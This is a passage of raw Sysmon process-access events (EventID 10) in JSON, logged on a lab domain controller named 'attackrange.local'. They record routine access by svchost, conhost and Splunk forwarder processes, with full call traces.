C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6252,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.065\r\nSourceProcessGUID: {E2A3D6B1-11FF-5F25-0000-0010011F0900}\r\nSourceProcessId: 4820\r\nSourceThreadId: 2552\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.065","SourceProcessGUID":"{E2A3D6B1-11FF-5F25-0000-0010011F0900}","SourceProcessId":"4820","SourceThreadId":"2552","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program 